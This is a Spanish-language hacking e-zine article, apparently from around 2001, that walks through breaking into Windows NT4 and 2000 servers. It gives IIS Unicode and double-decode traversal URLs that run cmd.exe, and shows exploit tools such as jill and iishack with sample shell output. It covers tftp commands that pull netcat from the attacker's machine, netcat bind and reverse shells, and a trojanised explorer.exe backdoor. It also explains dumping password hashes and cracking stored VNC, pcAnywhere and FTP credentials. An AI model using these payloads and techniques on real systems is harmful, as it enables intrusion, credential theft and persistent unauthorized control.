Fallas Básicas NT4 y Win2000
Por DeadSector
ffffffffffffffdsfsdfs

El motivo de este articulo es dar una explicación de las fallas comúnmente encontradas en Windows NT, los errores de los administradores y una pequeña descripción de el manejo de las herramientas mencionadas.

Las herramientas mencionadas en este articulo son:

pulist.exe = Te da listado de programas corriendo en Server y números PID.
Bájalo de ftp.microsoft.com
troyano.exe = Usa tu favorito, aquí usamos el netbus 1.7 modificado. Bájalo
de www.raza-mexicana.org
explorer.exe = By Vlad. Ejecuta un troyano al hacer login el admin. Bájalo
de www.raza-mexicana.org
pwdump2.exe = Saca hash de passwords para ser crackeados después.
nc.exe = Netcat para NT, para sacar un shell de Server.
kill.exe = Permite terminar ciertos procesos en NT.
cerberus = Scanner para buscar fallas en Server.
superscan = Scanner de puertos.
tftp.exe = Server de tftp.

Empecemos con el típico scan de puertos con superscan, el cual nos dice cuales puertos tiene abiertos y accesibles desde fuera, una vez dentro comparamos con resultado de "netstat -an" as sabremos si están cerrados o simplemente bloqueados por firewall.

Encontramos puertos de ftp, web server, file and printer sharing, pcanywhere y VNC abiertos.

Seguimos con scan de cerberus el cual nos dirá que fallas tiene el web server, shares, ftp, etc.

Por ultimo checamos si el server tiene bug de extended unicode o cgi filename decode error. Esto lo puedes hacer con script o directamente con internet explorer checando los diferentes directorios.


UNICODE
http://server/cgi-bin/..$c0%af../winnt/system32/cmd.exe?/c+dir
http://server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://server/iisadmpwd/..%c0%af../cmd.exe?/c+dir
http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

CGI FILENAME DECODE ERROR
http://server/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
http://server/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
http://server/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
http://server/iisadmpwd/..%255c../cmd.exe?/c+dir+c:\

No solo %c0%af funciona, puedes intentar %c1%1c ,%c0%9v ,%c0%qf ,%c1%8s
,%c1%9c ,%c1%pc .

Ahora ya tienes la información necesaria para empezar.

Lo que buscamos es control total del servidor. Se debe conseguir acceso al server y mantenerlo durante el tiempo posible.

No buscamos hacer un defacement estúpido y sin sentido.
No buscamos cambiar calificaciones porque vas mal en la escuela.
No buscamos formatear 3 o 4 computadoras porque un ircop te dio kill.
No buscamos espiar al partido político de la oposición o espionaje empresarial.
No buscamos borrar archivos ni formatear la computadora solo porque el admin te cae mal.
No buscamos robar tarjetas de crédito para comprar porno, ni para comprar una guitarra a un amigo, ni comprar regalos a tu novia o una gorrita 31337 que diga "ROOT"

"Como cambio mis calificaciones?" = Estudiando. Las respuestas están enfrente de ti, han estado ahí todo el tiempo, escucha a tu maestro, lee los libros haz tu tarea, no seas un zángano.

El scan se debe expander a todas las máquinas de la red, no solo al servidor. La mayor parte de la información esta en las maquinas de los admins o gente de soporte. En un pwl puede estar el pass de admin de un server y en el 90% de los casos tienen grabados los passwords en archivos como cuteftp, wsftp, eudora, netscape, vnc, icq, pcanywhere, napster y en unos casos en MYDOCUMENTS en un archivo llamado IMPORTANTE.XLS o IMPORANTE.DOC.


CHECANDO FTP :

Lo primero de la lista fue el ftp, aquí solo buscamos lo básico. Ver si tenemos acceso con cuenta anónima o con alguna cuenta que salió de cerberus. Si tienes acceso checa si puedes ver c:\ d:\ o cualquier directorio importante. Buscar algún archivo que contenga un password. Ver si tenemos derecho a escribir en algún directorio, ya sea solo web, c:\ etc. Inclusive se podría hacer un dir llamado cgi-bin que te permita ejecutar tus archivos desde web. Si tienes acceso a c:\ subes explorer.exe y troyano y esperas que el admin haga login.

Este programa (EXPLORER.EXE) se ejecuta cuando hace login el admin, para mas información lee la info que viene en el zip. EXPLORER.EXE ejecutara el troyano y después el explorer.exe original de c:\winnt Todo esto sucede invisible y el admin no se da cuenta de nada.

Una explicación mas detallada de como ejecutar desde web o explorer.exe viene mas adelante.

Si eres algún niño llamado Carlitos y solo se te ocurre usar esta falla para subir un estúpido
html diciendo que rulas y que haz "rooteado" el servidor Nt estas limitándote demasiado,
alguien así seria y creo que seguiría siendo por mucho tiempo un Grandísimo Pendejo. Y créanme que existe gente así, los he visto, son de esos "Súper 31337 hax0rs 4 ev3r rulz!!" que piensan que todo mundo les envidia su elitismo inexistente; Carlitos, un servidor NT
JAMAS puede ser "rooteado" grandísimo animal. NO existe root en NT.


CHECANDO WEB SERVER

FRONTPAGE
Continuamos con web server, nunca olvides checar el acceso al web server usando FrontPage, aun existen demasiados webs con FrontPage sin password. FrontPage te permite subir archivos al server, incluyendo ejecutables y puedes dar privilegios a los directorios para que te permitan ejecutar progs desde web, solo tienes que IMPORTAR tu archivo al web server y listo. Si te vas a las propiedades del server puedes sacar la lista de usuarios del servidor.

Este solo es el primer paso, de aquí puedes controlar el servidor, pero eso depende de ti.

Si eres algún "cyberh4x0r Rul3z ph33r me" y solo se te ocurre usar FrontPage para poner tu html que dice: "OWNED! aquí no hay seguridad, denme trabajo!! Yo si se!! admin mail me!" y cuando el admin te pide ayuda lo único que sabes es decir con letras y números: "4rr3gl4 tu Fr0nt P4g3 ! Usa Linux!! NT tiene demasiadas f4ll4s !" entonces también suckeas y eres digno de llevar el nombre de Pendejo a donde quiera que vayas, y si, aunque no lo crean también existe gente así.


WINDOWS2000
Si el server es W2k y no esta parchado contra el overflow de HTTP, print request o Windows 2000 Internet Printing ISAPI Extensión Overflow como también se le conoce, podrías conseguir acceso al server con privilegios de LOCAL SYSTEM y de ahí conseguir pass de admin. Porque digo conseguir admin si ya se tiene system? Porque con system vales pito en el dominio, domain admin es lo que importa, así controlas TODAS las maquinas del dominio y no solo esa. Para esto solo usas xploits como jill.c para mandar una sesión de command prompt a tu maquina.

Primero usas NC para abrir un puerto en tu maquina y esperar la shell.

nc.exe -l -p 8080 <--- Esto abre el puerto 8080 en tu maquina.

Luego ejecutas jill en tu maquina y pides el shell a puerto 80 de tu maquina con:

jill sever.com 80 tu-maquina-ip tu-puerto
jill www.server.com 80 127.0.0.1 8080 <-- substituye 127.0.0.1 por tu ip

Y en la pantalla donde tienes nc.exe escuchando debe salir el típico:

Microsoft Windows 2000 [Version 5.10.6578]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>_


IISHACK1.5 y NT4
Otra manera de conseguir LOCAL SYSTEM en NT4 seria usando el iishack1.5 de eeye. Este prog utiliza 2 fallas de NT. Primero un bug del web server para subir el .asp y después
otro overflow que se ejecuta al pedir ese asp.

Este es entre los favoritos de los scriptkiddies, porque solo basta con correrlo.

iishack1.5.exe www.server.com 80 6969

Esto busca la falla remota en server puerto 80 y si la encuentra sube el ..asp, luego lo ejecuta y abre el puerto 6969.

así que solo haces telnet a server puerto 6969 y ya tienes tu shell de LOCAL SYSTEM.

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
c:\>_


IISHACK y NT4
Y de los viejitos que aun puedes encontrar de vez en cuando esta el iishack.exe, ese afectaba maquinas NT4 si no tenían instalado SP6.

iishack.exe www.server.com 80 www.tuserver.org\troyano.exe

Esto tronaba el web server y lo hacia que bajara tu troyano y lo ejecutara, luego entrabas por telnet si lo que subiste te daba shell o con el cliente de tu troyano.


MSADC
De msadc ni voy a hablar porque ya salió un artículo en boletin 10
(10-> Sobrepasando Firewalls 101 ......................... ]-( 0x90 )--

Pero las mismas técnicas que explicare para extended unicode se pueden usar para msadc, solo que en lugar de hacerlo desde internet explorer se hacen con script msadc.pl y sin ver los resultados que te da el server.

EXTENDED UNICODE & CGI FILENAME DECODE ERROR
Las fallas de extended unicode y cgi filename decode error funcionan engañando al webserver, lo que hacen es brincar restricción de directorio root permitiéndote salir a resto de disco, esto solo funciona si cmd.exe se encuentra en mismo disco que dir que estas
pidiendo.

El extended unicode lo utiliza mandando el equivalente a / = %c0%af

El cgi filename convierte el \ en %5c HEX
después convierte de nuevo %5c en '%' = %25 '5' = %35 'c' = %63
Lo haces de nuevo y tienes las variables %255c %%35c %%35%63 %25%35%63

Por ejemplo si pides /scripts/.../cmd.exe?/c+dir
c:\winnt\system32\cmd.exe y d:\inetpub\scripts <---ahí no funciona ya que no están en mismo disco.

Si pides http:\\server\msadc\..cmd.exe?/c+dir
c:\winnt\system32\cmd.exe y c:\program files\common files\system\msadc <--- ahí si funciona.

Esto solo te permite ejecutar comandos con privilegios de cuenta IUSER_nombremaquina.

Primero tenemos que encontrar que dir te permite ejecutar. Como ya lo dijimos las opciones son:

UNICODE
http://server/cgi-bin/..$c0%af../winnt/system32/cmd.exe?/c+dir
http://server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://server/iisadmpwd/..%c0%af../cmd.exe?/c+dir
http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

CGI FILENAME DECODE ERROR
http://server/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
http://server/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
http://server/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
http://server/iisadmpwd/..%255c../cmd.exe?/c+dir+c:\

No solo %c0%af funciona, puedes intentar %c1%1c ,%c0%9v ,%c0%qf ,%c1%8s ,%c1%9c ,%c1%pc

Con esto puedes ejecutar cualquier comando como si estuvieras en tu shell de command prompt, usa tu imaginación. Comandos comúnmente usados son COPY, DIR, DEL, ATTRIB, MOVE, NETSTAT, etc.

Antes de empezar asegúrate de tener TFTP server corriendo en tu maquina y las herramientas en el directorio de default. ASEGURATE que esta funcionando, no pierdas tu tiempo si tu isp o firewall tienen bloqueados puerto 69 UDP.

Desde internet explorer o usando tu script favorito pide:

UNICODE
http://server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
CGI FILENAME DECODE
http://server/scripts/..%255c..%255cwinnt/system32/cmd.exe?/cdir
Esto te dará listado de directorio scripts.

UNICODE
http://server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
CGI FILENAME
http://server/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Esto te dará listado de dir c:\

UNICODE
http://server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+type+c:\boot.ini
CGI FILENAME
http://server/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+type+c:\boot.ini
Esto ejecuta el comando TYPE y te da el contenido de archivo boot.ini

UNICODE
http://server/scripts/..%c0%af../winnt/system32/netstat.exe?-an
CGI FILENAME
http://server/scripts/..%255c..%255cwinnt/system32/netstat.exe?-an
Esto te da listado de puertos abiertos en server y las conexiones activas.

Compara esto con el listado de puertos que te dio el scanner. Si con scanner solo podías ver
puerto 80 pero con netstat puedes ver que tienen abiertos 21, 80, 110, 1024, etc, entonces sabes que tienen algún tipo de firewall. El tipo de ataque cambia dependiendo del firewall.

UNICODE
http://server/scripts/..%c0%af../winnt/system32/net.exe?view
CGI FILENAME
http://server/scripts/..%255c..%255cwinnt/system32/net.exe?view
Esto te da listado de maquinas en ese Dominio, muchas de ellas pueden estar compartiendo los discos.

UNICODE
http://server/scripts/..%c0%af../winnt/system32/net.exe?view+/domain
CGI FILENAME
http://server/scripts/..%255c..%255cwinnt/system32/net.exe?view+/domain
Esto te da listado de DOMINIOS de esa red.

Puedes estar así todo el mendigo día pero no te lo recomiendo, solo son ejemplos.

Esto seria lo siguiente para conseguir acceso a un server.
http://.../cmd.exe?/c+tftp+-i+TuMAQUINA+get+nc.exe+c:\nc.exe

Ojo, estoy abreviando el server.com/scripts/blah blah blah. tu lo tienes que poner completo en tu browser, esto haría que tu el server baje de tu maquina el nc.exe y lo guarde en c:\

Porque en c:\ ? para evitar pedos, a veces esta configurado el server para que no cualquiera pueda escribir a dir de web o cualquier directorio, pero siempre se puede escribir en c:\. o casi siempre. Solo he encontrado un server donde cerraron casi todo.

Ese día batalle pero encontré la manera de subir troyano y ejecutarlo. Como? Aunque tenia cuenta de admin no me dejaba pero dejaron un directorio donde podía escribir. Era el de antivirus, norton creo o mcafee. Apague el servicio antivirus desde computer manager, me fije el nombre de ejecutable, subí mi troyano a ese dir con ese nombre, volví a arrancar el servicio de antivirus y Tómala! Se ejecuta el troyano, todo gracias al antivirus.

Continuemos. Ahora ya tenemos c:\nc.exe solo falta ejecutarlo y entrar por telnet.
http://.../cmd.exe?/c+c:\nc.exe+-l+-p+3000+-e+cmd.exe

Esto te da un shell de command prompt en el puerto 3000. Solo haces telnet a ese puerto.
Si tienen algún firewall has que el servidor te mande el command prompt a tu maquina.

Primero corre en tu maquina NC.EXE -l -p 80
Esto hace que netstat escuche en tu puerto 80 y espere alguna conexión, luego pides al server.
http://.../cmd.exe?/c+c:\nc.exe+TUMAQUINA+80+-e+cmd.exe

Esto hace que el server haga un conexión al puerto 80 de tu maquina y te mande sesión de
command prompt.

Una vez dentro, tienes que subir EXPLORER.EXE y TROYANO.EXE a dir c:\ El explorer.exe de vlad@raza-mexicana.org hace que cuando el admin haga login ejecute automáticamente el troyano, después el verdadero c:\winnt\explorer.exe este programa lo puedes bajar de www.raza-mexicana.org

Después ejecutas PULIST.EXE o TLIST.EXE (el que tengas) y apuntas todos los nombres y PIDS de los programas que están corriendo. Luego con NET START te dirá que servicios están corriendo, apunta todo. Busca en todos los directorios y en todos los HD que encuentres, apunta que software tienen instalado, checa las fechas, cuales son los que mas utilizan?

Quieres mas backdoors? Copia CMD.EXE a scripts, otro buen lugar para cmd.exe
Seria c:\program files\common files\system\msadc

Renómbralo a otra cosa, si pides desde web a cmd.exe que redireccione algo a >archivo no te deja, pero si se llama de otra manera si te deja. Por ejemplo http://server/scripts/cmd.exe?/c+dir+>dir.txt no funciona
Pero http://server/scripts/elcmdexe.exe?/c+dir+>dir.txt si funciona


CUENTAS y SHARES
Lo que buscamos son cuentas con pass en blanco o pass igual a login, si consigues pass de
ADMINISTRADOR que bien, si es un simple USER puedes elevar tus privilegios. Recuerda que un USER puede escribir a C:\ o prender y apagar ciertos servicios.

Los shares C$ D$ solo pueden ser utilizadas si eres admin, No importa que solo puedas montar IPC$ como USER, esto serviría de mucho. Muchos passwords están en registro de windows y pueden ser sacados luego crackeados usando una simple cuenta de USER. Solo tienes que mapear IPC$ correr regedit en tu maquina y seleccionar CONNECT NETWORK REGISTRY.

Por ejemplo VNC y EXCHANGE, puedes sacar el pass encryptado de VNC y crackearlo.

Si conseguiste acceso a c:\ busca en todos los directorios, lo que buscamos son archivos que
contengan passwords, archivos como WS_FTP.INI, cuteftp SMDATA.DAT, pcanywhere USER.CIF, EUDORA.INI, etc.

Sube explorer.exe y troyano a c:\ y espera que el admin haga login, esto te conseguirá un backdoor para regresar en futuro.


QUE MAS???
Bueno no importa que usaste para entrar, una vez que consigues admin puedes snnifear el trafico de la red, puedes conseguir pass de otras máquinas, hacer lo que quieras.

A veces no es suficiente cambiar el pass de ranita a ranita1.

Si sabes que alguien entro a tu maquina lo recomendable es FORMATEAR, no puedes confiar en un server después de que alguien entro.

Como sacar los passwords? Si ya tienes privilegios de admin solo ejecuta pulist y apunta el PID de LSASS, luego ejecutas en el server pwdump2.exe 48 <-- en caso de que ese fuera el pid esto te da listado de hash a pantalla. Si quieres grabar a archivo seria pwdump2.exe 48 > passwords-hash.txt

Ahora sube password-hash.txt a tu maquina y usa l0phtcrack o LC3 como ahora se llama para crackear los passwords.Si conseguiste smdata.dat instala cuteftp en tu maquina y metelo a ese directorio, luego corres cuteftp y con REVELATION ves los passwords detrás de los ********** si sacaste WS_FTP.INI o algún otro ini de la misma manera los puedes crackear o simplemente busca un prog que desencripte estos passwords.


PCANYWHERE
Te acuerdas que salió ese puerto abierto? Busca los archivos *.cif de directorio:
c:\program files\pcanywhere\data\ o c:\program files\symantec\pcanywhere\data
O en cualquier lugar donde puedan estar los *.cif, muchas veces los tienen, baja esos a tu maquina. Instalas PCANYWHERE v.8 en tu maquina. y con REVELATION sacas los pass detrás de ************

OJO dije versión 8 ( ocho ) no dije 9 ni 9.2 ni 10. dije 8 ( ocho )

Solo selecciona archivo.cif y con botón derecho seleccionas PROPERTIES luego ventana de SETTINGS y ahí viene el ***** con revelation sale el pass. Prendes pcanywhere y entras al server, el login será el nombre de archivo.


WINVNC
Para los que no lo conocen VNC es uno de mis programas favoritos. Funciona parecido a pcanywhere, pero es gratuito y mide muy poco, el único problema es que la seguridad la tienes que configurar directamente al registro de windows. desde registro tu decides de cuales ips pueden entrar. y cosas por el estilo. Eso nos conviene ya que nadie lo hace o no saben como, cualquier usuario puede leer el registro y sacar el pass encriptado. Desde command prompt puedes pedir comando.

regedit /e vnc.reg HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3
o
regedit /e vnc.reg HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default

Esto mandaría el contenido de winvnc a archivo reg y de ahí puedes ver el pass y desencriptarlo usando cracker para winvnc.lo, puedes bajar de aquí: VNCrackX4 by Phenoelit (www.phenoelit.de)

Ya con ese pass entras al server de vnc desde internet explorer o usando el cliente de WINVNC.
http://server:5800 (o 5900 no recuerdo el puerto exacto)

EXCHANGE
Este también guarda los passwords encriptados en registro y cualquiera los puede leer, solo es cuestión de sacar los pass y usar el algoritmo para conseguir el clear text pass. busca en securityfocus.com . ahí viene la manera de desencriptarlos fácilmente. Solo necesitas papel y lápiz.

Una manera de ver el registro es mapear un share, ejecutas regedit en tu maquina y seleccionas opción de CONNECT NETWORK REGISTRY.


AT
El comando AT puede ser utilizado para ejecutar programas en server con privilegios de LOCAL SYSTEM. Mapeas un share como admin, ya sea IPC$ o el que quieras luego das en tu maquina el comando
NET TIME \\127.0.0.1 <-- el ip del server
Te dará la fecha y hora de server.
Current time at \\127.0.0.1 is 4/10/2001 06:56 AM
Y si quieres que se ejecute a las 7 das el comando
AT \\127.0.0.1 7:00AM " "calc.exe" "
Eso ejecutaría el prog calc.exe a las 7am con privilegios de LOCAL SYSTEM.

Si esta apagado el servicio AT lo puedes prender desde tu maquina. En W2k te vas a control panel ADMINISTRATIVE TOOLS y ejecutas COMPUTER MANAGEMENT, luego ACTION y CONNECT TO ANOTHER COMPUTER. De ahí puedes prender servicios, rebootear maquina, borrar logs, etc. también existe un prog que puedes bajar del ftp de microsoft; SC.exe, que te permite modificar servicios desde command prompt. Vale la pena bajarlo junto con pulist, kill y otros programas desde ftp microsoft.

Para prender AT te vas a SERVICES y prendes el TASK SCHEDULER, ahora ya puedes usar AT desde tu maquina.

Si la maquina que estas controlando es W2k seleccionas donde dice COMPUTER MANAGEMENT (127.0.0.1) y le picas con botón derecho. luego seleccionas properties.en ADVANCED STARTUP AND RECOVERY trae la opción de SHUTDOWN. sirve si instalaste parche y quieres hacer reboot.

LOGFILES

Aunque no lo creas una de las cosas que te puede AYUDAR a conseguir ADMIN son los LOGFILES. si alguien te dice que lo primero que debes hacer al entrar a un server es borrar los logfiles estan equivocados.

Por lo regular se encuentran en este directorio c:\winnt\system32\logfiles
Ahi te daras cuenta cuando el admin hace login desde otra maquina. ya sea por ftp etc. Dale una checadita a esa otra maquina.
ya me toco un caso donde el admin tenia mas o menos seguro el server y no se podia hacer nada. pero vi un ip en los logs y su login. al checar esa otra maquina me di cuenta que tenia la misma falla que el server pero ahi tenia grabado su password en un archivo ADMIN.CIF en directorio pcanywhere\data.
bajas ese archivo a tu maquina sacas el pass y Bingo! puedes entrar al server deseado ahora con tus privilegios de ADMIN.

FIN

Es todo por hoy. Existen mas cosas que se pueden hacer en un server? SI. Me falto algo en este text? SI.

Quieres escribirme para echarme pedos porque no pudiste hacer algo que dije?
Quieres contarme de otros bugs que descubriste y que no se han publicado?
Quieres mentarme la madre porque no me explique correctamente?
Quieres explicarme como se debe h4x0rear un server?

Si respondiste SI a cualquiera de esas preguntas, no pierdas tu tiempo. Casi no contesto los e-mails y muchas veces los borro sin leerlos. Lo que debes hacer es escribir un articulo y mandarlo a raza-mexicana. Coopera con lo poco que puedas.

Escribe de lo que sabes, faltan demasiados detalles, fallas, parches, etc, que no se mencionaron aquí. Cualquiera de esos seria un buen articulo.

Para aquellos que no saben y quieren aprender pueden mandar sus requests. Se pasara a resto de integrantes del team y probablemente saldrá un articulo hablando de eso en próximo Ezine.

Para los newbies que apenas empiezan. Me gustaría enseñarles lo hermoso que es encontrar una solución a un problema, compartir lo que se siente al ayudar a un amigo a reparar su maquina o parchar su server. Por favor evítenme la pena de rayarles la madre y no manden correos pidiendo hackear un server por x razón.

Me gustaría juntar un team de 300 newbies y enseñarles lo poco que se, siempre ha sido mi sueño. Si te crees lo suficiente newbie envíame un email, cuando juntemos 300 empezamos.


Nos vemos.

Asegurando un poco tu Redhat 6
Robin hood de la red


 
Comentarios a : deadsector@raza-mexicana.org